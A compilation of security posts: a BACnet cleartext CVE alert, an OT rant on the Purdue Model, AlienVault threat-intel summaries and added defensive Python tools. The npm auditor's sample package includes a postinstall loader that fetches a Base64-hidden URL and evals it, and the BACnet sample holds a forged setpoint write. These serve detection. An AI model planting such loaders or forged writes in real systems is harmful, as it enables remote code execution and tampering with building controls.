CVE-2026-24060 (CRITICAL): WebCTRL Premium Server sends BACnet data in cleartext, risking interception & modification. No patch yet — segment OT networks & use VPNs for BACnet traffic. Monitor for sniffing, restrict access. Details: https://radar.offseq.com/threat/cve-2026-24060-cwe-319-in-automated-logic-webctrl--ad487a9d #OffSeq #ICS #Vuln #BACnet
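BACnet/IP (ASHRAE 135 Annex J) carries no encryption of its own, so anyone on the same broadcast domain can read setpoints and forge writes just by following the header layout. As an added example, not code from the advisory, the OffSeq write-up or Automated Logic, the Python below decodes BVLC/NPDU/APDU headers the way an on-path observer would and flags state-changing services from any host other than the BMS server. The frames, the IP addresses and the allowed-writer set are constructed assumptions; nothing here is a capture from WebCTRL.

```python
# Added example: minimal BACnet/IP decoder plus a "who is writing to controllers"
# check. Frames, addresses and ALLOWED_WRITERS are constructed for illustration.
import struct

BVLC_TYPE = 0x81  # BACnet/IP (Annex J) virtual link control
BVLC_FUNCTIONS = {0x04: "Forwarded-NPDU", 0x0A: "Original-Unicast-NPDU",
                  0x0B: "Original-Broadcast-NPDU"}
PDU_TYPES = {0: "Confirmed-Request", 1: "Unconfirmed-Request", 2: "Simple-ACK",
             3: "Complex-ACK", 4: "Segment-ACK", 5: "Error", 6: "Reject", 7: "Abort"}
CONFIRMED_SERVICES = {12: "ReadProperty", 14: "ReadPropertyMultiple",
                      15: "WriteProperty", 16: "WritePropertyMultiple",
                      17: "DeviceCommunicationControl", 20: "ReinitializeDevice"}
UNCONFIRMED_SERVICES = {0: "I-Am", 8: "Who-Is"}
# Services that change controller state: what a forged cleartext packet would carry.
WRITE_SERVICES = {15, 16, 17, 20}
# Assumption: the only host that should ever write to field controllers.
ALLOWED_WRITERS = {"10.10.1.5"}


def _skip_npdu(buf, off):
    """Return (apdu_offset, control_byte); walks the optional DNET/SNET fields."""
    version, control = buf[off], buf[off + 1]
    if version != 1:
        raise ValueError("unsupported NPDU version %d" % version)
    if control & 0x80:
        raise ValueError("network-layer message, no APDU")
    off += 2
    if control & 0x20:            # DNET (2) + DLEN (1) + DADR (DLEN octets)
        off += 3 + buf[off + 2]
    if control & 0x08:            # SNET (2) + SLEN (1) + SADR (SLEN octets)
        off += 3 + buf[off + 2]
    if control & 0x20:            # hop count is present whenever DNET is
        off += 1
    return off, control


def decode_bacnet_ip(frame):
    """Decode the BVLC + NPDU + APDU header of one UDP/47808 payload."""
    if len(frame) < 4 or frame[0] != BVLC_TYPE:
        raise ValueError("not a BVLC frame")
    func, length = frame[1], struct.unpack(">H", frame[2:4])[0]
    if length != len(frame):
        raise ValueError("BVLC length %d != payload length %d" % (length, len(frame)))
    off = 4 + (6 if func == 0x04 else 0)   # Forwarded-NPDU carries a 6-octet B/IP address
    off, control = _skip_npdu(frame, off)
    pdu_type = frame[off] >> 4
    info = {"bvlc": BVLC_FUNCTIONS.get(func, "0x%02x" % func),
            "pdu_type": PDU_TYPES.get(pdu_type, str(pdu_type)),
            "expecting_reply": bool(control & 0x04),
            "invoke_id": None, "service": None, "write": False}
    if pdu_type == 0:   # type/flags, max-segs/max-APDU, invoke ID, [seq, window], service
        segmented = bool(frame[off] & 0x08)
        choice = frame[off + (5 if segmented else 3)]
        info["invoke_id"] = frame[off + 2]
        info["service"] = CONFIRMED_SERVICES.get(choice, "confirmed-%d" % choice)
        info["write"] = choice in WRITE_SERVICES
    elif pdu_type == 1:  # type, service choice
        choice = frame[off + 1]
        info["service"] = UNCONFIRMED_SERVICES.get(choice, "unconfirmed-%d" % choice)
    return info


def triage(packets):
    """packets: iterable of (src_ip, dst_ip, udp_payload). Returns alert lines."""
    alerts = []
    for src, dst, frame in packets:
        try:
            info = decode_bacnet_ip(frame)
        except (ValueError, IndexError) as exc:
            alerts.append("%s -> %s: undecodable BACnet/IP (%s)" % (src, dst, exc))
            continue
        if info["write"] and src not in ALLOWED_WRITERS:
            alerts.append("%s -> %s: %s invoke %d from non-BMS host"
                          % (src, dst, info["service"], info["invoke_id"]))
    return alerts


# Constructed frames, built from the encoding rules rather than captured:
WHO_IS = bytes.fromhex("810b000c0120ffff00ff1008")                 # broadcast Who-Is
READ_PV = bytes.fromhex("810a001101040005020c0c008000011955")       # ReadProperty AV:1 present-value
WRITE_PV = bytes.fromhex("810a001a01040005010f0c008000011955"      # WriteProperty AV:1
                         "3e4441b400003f4908")                      # present-value = 22.5, priority 8
SAMPLE_TRAFFIC = [("10.10.1.5", "10.10.255.255", WHO_IS),
                  ("10.10.1.5", "10.10.2.20", READ_PV),
                  ("10.10.7.99", "10.10.2.20", WRITE_PV)]           # unexpected host changing a setpoint

if __name__ == "__main__":
    for alert in triage(SAMPLE_TRAFFIC):
        print(alert)
```

Decoding like this is observation only: it tells you that a setpoint was written from an unexpected source after the fact. It does not stop the write, which is why the post's advice of segmenting the OT network and tunnelling BACnet over a VPN comes first, and a monitor of this kind is the check that the segmentation actually holds.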

I just realized that so many people in the company simply don’t understand, or don’t want to understand, the Purdue Model!

The Purdue Model is a functional model. Its origins have nothing to do with cybersecurity. It was adopted for cybersecurity, but not as a “zone” model. Its purpose is to define the functional layers at which different methods and tools are used. You don’t simply use typical IT tools at the lower levels!

The DMZ was added much later, as the model evolved into a cybersecurity model. “Additional segmentation can be performed using the concept of zones and conduits described in ISA 62443.” The layers are not intended to define a zone per se. Anyone who does not divide the layers into discrete security zones based on an analysis should not even attempt to work in this (OT) area!

Furthermore, individuals have the flexibility to design their own separation, segmentation, and zone configuration within each architecture, taking into account specific functional and application-related requirements. This approach enables the creation of a robust defense in depth, with the Purdue model serving as a guide while allowing for customization as needed, without rigid requirements.

I will not show these guys how the ISA 62443 and the Purdue model match, because I expect that experts can do it and those who can't do it have to learn.

#OTSecurity #Cybersecurity #ICS #Purdue

Threat Spotlight: ShinyHunters Fast-Tracks SaaS Access with Subdomain Impersonation

The threat group ShinyHunters has adopted a new tactic of subdomain impersonation for initial access, moving away from newly registered lookalike domains. They are utilizing mobile-first lures and outsourcing spam services to scale their operations. The group is likely reusing previously stolen CRM and ERP data to drive social engineering attacks. Their approach involves phone-guided adversary-in-the-middle phishing to capture credentials and authenticated sessions. ShinyHunters is also scaling vishing operations through paid contractors and specialized harassment services. This evolution in tactics allows for rapid identity-to-SaaS compromise without deploying malware, making traditional domain-based monitoring less effective.

Pulse ID: 69bc06c6867cdad6f8a94d99
Pulse Link: https://otx.alienvault.com/pulse/69bc06c6867cdad6f8a94d99
Pulse Author: AlienVault
Created: 2026-03-19 14:23:02

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#AdversaryInTheMiddle #CyberSecurity #ICS #InfoSec #Malware #OTX #OpenThreatExchange #Phishing #RAT #SocialEngineering #Spam #bot #AlienVault

LevelBlue - Open Threat Exchange

Learn about the latest cyber threats. Research, collaborate, and share threat intelligence in real time. Protect yourself and the community against today's emerging threats.

LevelBlue Open Threat Exchange
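The point the pulse makes about domain-based monitoring is that a lookalike watchlist keys on the registered (registrable) domain, while subdomain impersonation puts the brand name in labels left of a registrable domain the attacker legitimately owns. As an added example, not from the pulse or the report it summarizes, the Python below scans resolver log lines for monitored brand names sitting in subdomain labels of a foreign registrable domain. The brand list, the brand-owned domains, the tiny suffix table standing in for the Public Suffix List, and the log lines are all constructed assumptions.

```python
# Added example: flag hostnames that carry a monitored brand in a subdomain label
# while the registrable domain is not one the brand owns. All lists and log
# lines below are constructed for illustration.
import re
from collections import namedtuple

MONITORED_BRANDS = ("examplecorp", "okta", "microsoft", "salesforce")            # assumption
BRAND_OWNED = {"examplecorp.com", "okta.com", "microsoft.com", "salesforce.com"}  # assumption
# Stand-in for the Public Suffix List; a real deployment should load the PSL.
MULTI_LABEL_SUFFIXES = {"co.uk", "com.au", "co.jp"}
# Digit-for-letter substitutions commonly used in lure labels (0kta, m1crosoft, ...).
_CONFUSABLES = str.maketrans("0135", "oles")

Finding = namedtuple("Finding", "client host registrable label brand")


def registrable_domain(host):
    """Last two labels, or three when the suffix is a known multi-label one."""
    labels = host.lower().rstrip(".").split(".")
    if len(labels) >= 3 and ".".join(labels[-2:]) in MULTI_LABEL_SUFFIXES:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def subdomain_labels(host):
    host = host.lower().rstrip(".")
    prefix = host[: -len(registrable_domain(host))].rstrip(".")
    return [label for label in prefix.split(".") if label]


def impersonated_brands(host):
    """(label, brand) pairs where a brand name sits left of a foreign registrable domain."""
    if registrable_domain(host) in BRAND_OWNED:
        return []
    hits = []
    for label in subdomain_labels(host):
        norm = re.sub(r"[^a-z]", "", label.translate(_CONFUSABLES))
        for brand in MONITORED_BRANDS:
            if brand in norm:
                hits.append((label, brand))
    return hits


LOG_RE = re.compile(r"client=(?P<client>\S+)\s+qname=(?P<qname>\S+)")


def scan_dns_log(lines):
    """Run impersonated_brands over every qname in resolver-style log lines."""
    findings = []
    for line in lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        host = m.group("qname")
        for label, brand in impersonated_brands(host):
            findings.append(Finding(m.group("client"), host,
                                    registrable_domain(host), label, brand))
    return findings


# Constructed resolver log lines, not real traffic.
SAMPLE_LOG = [
    "2026-03-19T14:23:02Z client=10.0.0.12 qname=login.okta.com",
    "2026-03-19T14:23:05Z client=10.0.0.12 qname=examplecorp.okta.com",
    "2026-03-19T14:24:11Z client=10.0.0.31 qname=login.okta.com.support-portal.net",
    "2026-03-19T14:25:40Z client=10.0.0.31 qname=examplecorp-sso.0kta.helpdesk-tickets.co.uk",
    "2026-03-19T14:26:02Z client=10.0.0.44 qname=cdn.jsdelivr.net",
]

if __name__ == "__main__":
    for f in scan_dns_log(SAMPLE_LOG):
        print("%s queried %s: '%s' looks like %s under %s" % f)
```

Legitimate third parties that put a customer's name in a subdomain (status pages, ticketing vendors) will trip this check too, so in practice the BRAND_OWNED set grows into an allowlist of known SaaS vendors, and the findings feed a review queue rather than a block action.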

When tax season becomes cyberattack season: Phishing and malware campaigns using tax-related lures

During tax season, threat actors exploit the urgency of time-sensitive tax-related emails to trick targets into opening malicious attachments, scanning QR codes, or following link chains. Recent campaigns identified by Microsoft Threat Intelligence use lures around W-2 forms, tax forms, and impersonation of government tax agencies and financial institutions. These campaigns aim to harvest credentials or deliver malware, often using phishing-as-a-service platforms for convincing credential theft and MFA bypass. Notable tactics include using legitimate remote monitoring tools, targeting specific industries and roles like accountants, and employing sophisticated social engineering techniques. The campaigns leverage various file formats, legitimate infrastructure, and multiple user interactions to complicate detection.

Pulse ID: 69bc161bd79aba8d7aaa1eed
Pulse Link: https://otx.alienvault.com/pulse/69bc161bd79aba8d7aaa1eed
Pulse Author: AlienVault
Created: 2026-03-19 15:28:27

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CyberAttack #CyberSecurity #Email #Government #ICS #InfoSec #MFA #Malware #Microsoft #OTX #OpenThreatExchange #Phishing #RAT #SocialEngineering #bot #AlienVault

An Overview of The Gentlemen's TTPs

This intelligence report provides a comprehensive analysis of The Gentlemen, a ransomware group known for its sophisticated tactics, techniques, and procedures (TTPs). The group exploits vulnerabilities in FortiOS/FortiProxy, maintains a database of compromised devices, and employs advanced defense evasion techniques. Their initial access methods include exploiting public-facing applications and brute-force attacks. The Gentlemen utilize various execution, persistence, and privilege escalation techniques, while also focusing on credential access and lateral movement. The group's impact includes data encryption and inhibiting system recovery. The report highlights the group's ongoing efforts to improve their ransomware capabilities by reverse-engineering other malware samples.

Pulse ID: 69bd045137b178c16714dcf6
Pulse Link: https://otx.alienvault.com/pulse/69bd045137b178c16714dcf6
Pulse Author: AlienVault
Created: 2026-03-20 08:24:49

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CyberSecurity #Encryption #ICS #InfoSec #Malware #OTX #OpenThreatExchange #Proxy #RCE #RansomWare #bot #iOS #AlienVault

Thanks to @PeskyPotato, #icalendar now has its first #tutorial!

🎉

Learn about how to create a #calendar #event, invite attendees and save it in an #ics file here:

https://icalendar.readthedocs.io/en/latest/tutorials/create-event-with-attendees.html

#rfc5545 #Python

Create event with attendees — icalendar 7.0.4.dev138 documentation
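The linked tutorial builds the event with the icalendar package. As an added example that is not the tutorial's code, the Python below produces the same kind of VEVENT with ORGANIZER and ATTENDEE properties directly against RFC 5545 using only the standard library, so the two details a hand-rolled generator usually gets wrong, TEXT escaping (section 3.3.11) and 75-octet line folding (section 3.1), are visible. The names, addresses and PRODID are made up; it assumes display names contain no double quotes.

```python
# Added example: RFC 5545 event with attendees using only the standard library.
# Not the icalendar package's code; names, addresses and PRODID are invented.
from datetime import datetime, timedelta, timezone
import uuid


def escape_text(value):
    """RFC 5545 3.3.11: escape backslash, semicolon, comma and newline in TEXT values."""
    return (value.replace("\\", "\\\\").replace(";", "\\;")
                 .replace(",", "\\,").replace("\n", "\\n"))


def fold(line):
    """RFC 5545 3.1: content lines over 75 octets continue on a new line after CRLF + space."""
    data, parts, limit = line.encode("utf-8"), [], 75
    while len(data) > limit:
        cut = limit
        while cut > 0 and (data[cut] & 0xC0) == 0x80:   # never split a UTF-8 sequence
            cut -= 1
        parts.append(data[:cut].decode("utf-8"))
        data, limit = data[cut:], 74                    # the leading space counts toward 75
    parts.append(data.decode("utf-8"))
    return "\r\n ".join(parts)


def unfold(text):
    """Reverse folding (a parser does this before splitting into content lines)."""
    return text.replace("\r\n ", "").replace("\r\n\t", "")


def _utc(dt):
    return dt.astimezone(timezone.utc).strftime("%Y%m%dT%H%M%SZ")


def build_invitation(summary, start, duration, organizer, attendees, uid=None):
    """organizer and attendees are (display name, e-mail) pairs; returns iCalendar text."""
    lines = ["BEGIN:VCALENDAR", "VERSION:2.0",
             "PRODID:-//example.invalid//stdlib sample//EN", "METHOD:REQUEST",
             "BEGIN:VEVENT", "UID:" + (uid or str(uuid.uuid4())),
             "DTSTAMP:" + _utc(datetime.now(timezone.utc)),
             "DTSTART:" + _utc(start), "DTEND:" + _utc(start + duration),
             "SUMMARY:" + escape_text(summary),
             'ORGANIZER;CN="%s":mailto:%s' % organizer]
    for name, addr in attendees:
        lines.append('ATTENDEE;CN="%s";ROLE=REQ-PARTICIPANT;PARTSTAT=NEEDS-ACTION;'
                     'RSVP=TRUE:mailto:%s' % (name, addr))
    lines += ["END:VEVENT", "END:VCALENDAR"]
    return "\r\n".join(fold(line) for line in lines) + "\r\n"


if __name__ == "__main__":
    ics = build_invitation("Quarterly review; budget",
                           datetime(2026, 4, 2, 9, 0, tzinfo=timezone.utc), timedelta(hours=1),
                           ("Ada", "ada@example.invalid"),
                           [("Grace", "grace@example.invalid"), ("Linus", "linus@example.invalid")])
    with open("invite.ics", "w", newline="") as fh:   # newline="" keeps the CRLF intact
        fh.write(ics)
```

Writing with newline="" matters: the default text mode on Windows would turn each CRLF into CR CR LF and break the folding for strict parsers.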

Inside a network of 20,000+ fake shops

A massive network of over 20,000 fraudulent e-commerce domains has been uncovered, all sharing common infrastructure and design patterns. These fake shops, primarily using the .shop domain, are designed to steal payment details and personal data from unsuspecting consumers. The operation is highly industrialized, with domains resolving to just 36 IP addresses, indicating a franchise-style model where a core team manages servers and templates while individual operators launch storefronts. The shops use familiar e-commerce tactics and psychological pressure to lure victims. To protect yourself, use browser protection tools, scrutinize unfamiliar domains, be wary of deep discounts, and look for independent reviews before making purchases.

Pulse ID: 69bad1ce2e55cd63732636dd
Pulse Link: https://otx.alienvault.com/pulse/69bad1ce2e55cd63732636dd
Pulse Author: AlienVault
Created: 2026-03-18 16:24:46

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#Browser #CyberSecurity #ELF #ICS #InfoSec #OTX #OpenThreatExchange #RAT #RCE #bot #AlienVault

Minecraft: Dark Tale of Scams, Malware & Extortion

The article exposes a sophisticated scam targeting Minecraft players through fake 'grief-free' server communities. The SugarSMP website, promising a safe gaming experience, was found to distribute malware-infected mod packs. The malware, named Spark stealer, steals sensitive data including Discord tokens, browser credentials, and crypto wallet information. The threat actors employ social engineering tactics to maintain their fake community's reputation and remove warnings about their activities. Multiple similar websites were discovered, all hosting various types of malware. The scam's persistence mechanisms and social engineering techniques are detailed, along with remediation steps for affected users.

Pulse ID: 69ba817a667265c550e1ce4a
Pulse Link: https://otx.alienvault.com/pulse/69ba817a667265c550e1ce4a
Pulse Author: AlienVault
Created: 2026-03-18 10:42:02

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#Browser #CyberSecurity #Discord #Extortion #ICS #InfoSec #Malware #Minecraft #OTX #OpenThreatExchange #SMS #SocialEngineering #bot #AlienVault

Analysis of the Spear-Phishing and KakaoTalk-Linked Threat Campaign

The Konni Group conducted a sophisticated multi-stage attack campaign, initiating with a spear-phishing email disguised as a North Korean human rights lecturer appointment. The attack progressed through execution of a malicious LNK file, installation of remote access malware, and long-term persistence for data theft. A key feature was the unauthorized access to victims' KakaoTalk PC applications, used to distribute additional malicious files to selected contacts. The campaign employed multiple RAT families, including EndRAT, RftRAT, and RemcosRAT, with a distributed C2 infrastructure across Finland, Japan, and the Netherlands. The threat actor's tactics included trust-based propagation, account session abuse, and modular payload deployment, highlighting the need for advanced behavior-based detection and multi-layered defense strategies.

Pulse ID: 69ba831f2287b29db4e4645e
Pulse Link: https://otx.alienvault.com/pulse/69ba831f2287b29db4e4645e
Pulse Author: AlienVault
Created: 2026-03-18 10:49:03

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CyberSecurity #DRat #DataTheft #Email #Finland #ICS #InfoSec #Japan #Konni #Korea #LNK #Malware #NorthKorea #OTX #OpenThreatExchange #Phishing #RAT #Remcos #RemcosRAT #Rust #SpearPhishing #TheNetherlands #bot #AlienVault

Contagious Trader campaign - Coordinated weaponisation of cryptocurrency trading bots by suspected DPRK malware operators

The Contagious Trader campaign is a sophisticated malware operation targeting cryptocurrency users, attributed to North Korea with high confidence. It involves malicious cryptocurrency trading bot projects on GitHub that exfiltrate sensitive data and private keys using various techniques, including malicious npm dependencies. The campaign demonstrates overlaps with known North Korean tactics, particularly those of FAMOUS CHOLLIMA, including the use of GitHub, npm, and Vercel infrastructure, Base64-encoded payload URLs, and anonymizing VPNs for npm package publishing. The operation represents a shift in tactics, expanding beyond the previous Contagious Interview campaign to target a broader range of cryptocurrency users.

Pulse ID: 69ba83542e3e56c9806b9659
Pulse Link: https://otx.alienvault.com/pulse/69ba83542e3e56c9806b9659
Pulse Author: AlienVault
Created: 2026-03-18 10:49:56

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CyberSecurity #DPRK #GitHub #ICS #InfoSec #Korea #Malware #NPM #NorthKorea #OTX #OpenThreatExchange #RAT #RCE #VPN #bot #cryptocurrency #AlienVault

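Two of the tells the pulse names, malicious npm dependencies and Base64-encoded payload URLs, can be checked before a trading-bot repository is ever installed. As an added example, not from the pulse or the report behind it, the Python below audits an in-memory copy of a package for npm lifecycle hooks (which run arbitrary commands at install time) and for Base64 runs in JavaScript that decode to http(s) URLs, and notes when such decoding sits next to eval or new Function. The sample package, its file names and its URL are constructed for illustration, not taken from any real project.

```python
# Added example: static pre-install check for lifecycle hooks and Base64-hidden
# URLs in an npm package. SAMPLE_PACKAGE is constructed, not a real project.
import base64
import binascii
import json
import re

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
B64_DECODE = re.compile(r"Buffer\.from\([^)]*['\"]base64['\"]\s*\)|\batob\(")
DYNAMIC_EVAL = re.compile(r"\beval\(|new Function\(")


def decoded_urls(text):
    """Base64 runs in text that decode to an http(s) URL."""
    urls = []
    for m in B64_BLOB.finditer(text):
        blob = m.group(0)
        try:
            raw = base64.b64decode(blob + "=" * (-len(blob) % 4)).decode("ascii")
        except (binascii.Error, UnicodeDecodeError):
            continue                      # not Base64, or not text: ignore
        if re.match(r"https?://\S+", raw):
            urls.append(raw.strip())
    return urls


def audit_package(files):
    """files: {relative path: text}. Returns (severity, path, detail) triples."""
    findings = []
    pkg = json.loads(files.get("package.json", "{}"))
    for hook, cmd in pkg.get("scripts", {}).items():
        if hook in LIFECYCLE_HOOKS:        # runs on `npm install` with no user action
            findings.append(("high", "package.json", "lifecycle hook %s runs: %s" % (hook, cmd)))
    for path, text in files.items():
        if not path.endswith((".js", ".mjs", ".cjs")):
            continue
        for url in decoded_urls(text):
            findings.append(("high", path, "base64-encoded URL: " + url))
        if B64_DECODE.search(text) and DYNAMIC_EVAL.search(text):
            findings.append(("medium", path, "base64 decode alongside eval/new Function"))
    return findings


# Constructed sample: a "trading bot" whose postinstall fetches and evals a payload
# from a URL hidden as Base64 (the literal decodes to https://example.invalid/bot.js).
SAMPLE_PACKAGE = {
    "package.json": json.dumps({
        "name": "mev-arb-bot", "version": "1.0.3",
        "scripts": {"postinstall": "node setup.js", "start": "node index.js"},
        "dependencies": {"ethers": "^6.0.0"}}),
    "setup.js": 'const u = Buffer.from("aHR0cHM6Ly9leGFtcGxlLmludmFsaWQvYm90Lmpz", "base64").toString();\n'
                'require("https").get(u, r => { let d = ""; r.on("data", c => d += c);'
                ' r.on("end", () => eval(d)); });\n',
    "index.js": "console.log('trading bot');\n",
}

if __name__ == "__main__":
    for severity, path, detail in audit_package(SAMPLE_PACKAGE):
        print("[%s] %s: %s" % (severity, path, detail))
```

Running a check like this against each cloned repository before `npm install` (or installing with `--ignore-scripts` and reviewing the hooks by hand) removes the install-time execution the campaign relies on; the Base64 check is a heuristic and will miss URLs split across strings or encoded twice.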